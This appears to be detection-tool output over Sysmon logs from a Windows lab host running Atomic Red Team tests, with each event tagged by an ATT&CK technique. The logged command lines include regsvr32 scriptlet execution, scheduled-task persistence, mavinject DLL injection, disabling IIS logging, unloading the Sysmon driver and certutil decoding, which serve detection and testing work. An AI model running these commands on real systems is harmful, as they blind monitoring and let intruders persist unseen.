High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4032 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.803 + 747F3D96-D976-5D31-0000-001041E83700 + 4444 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4031 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + 
+ + + 2019-07-19 14:53:42.384 + 747F3D96-D976-5D31-0000-0010D8D53700 + 6312 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4029 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.259 + 747F3D96-D976-5D31-0000-0010DBCC3700 + 6292 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "arp -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running 
image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4028 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:42.051 + 747F3D96-D976-5D31-0000-00104AC63700 + 6412 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4088 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.531 + 747F3D96-DA6A-5D31-0000-001025AD3E00 + 4552 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4086 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-19 14:57:46.443 + 747F3D96-DA6A-5D31-0000-0010C4A83E00 + 1408 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.411 + 747F3D96-DA6A-5D31-0000-001072A63E00 + 4276 + C:\Windows\System32\cmd.exe 
+ 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4084 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.174 + 747F3D96-DA6A-5D31-0000-0010C09D3E00 + 3224 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) 
through command line ( "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4082 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:46.051 + 747F3D96-DA6A-5D31-0000-0010B2953E00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "at 13:20 /interactive cmd" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4080 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.531 + 747F3D96-DA4C-5D31-0000-001077603D00 + 6172 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:16.477 + 747F3D96-DA4C-5D31-0000-0010655D3D00 + 2596 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c .\bin\T1055.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4078 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:15.754 + 747F3D96-DA4B-5D31-0000-0010CB413D00 + 2604 + C:\Windows\System32\mavinject.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft Application Virtualization Injector + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mavinject.exe" 3912 
/INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4077 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.972 + 747F3D96-DA4A-5D31-0000-00107A2C3D00 + 2584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1," + + + + + 1 + 5 + 4 + 1 + 
0 + 0x8000000000000000 + + + 4076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.928 + 747F3D96-DA4A-5D31-0000-00106C293D00 + 4056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4075 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.745 + 747F3D96-DA4A-5D31-0000-0010EE223D00 + 1012 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4074 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.696 + 747F3D96-DA4A-5D31-0000-0010C21F3D00 + 3976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4073 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.529 + 747F3D96-DA40-5D31-0000-0010E16B3C00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4069 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.346 + 747F3D96-DA40-5D31-0000-0010565D3C00 + 3932 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4068 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.316 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4067 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.256 + 747F3D96-DA40-5D31-0000-0010B1553C00 + 5168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + 
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4066 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.236 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 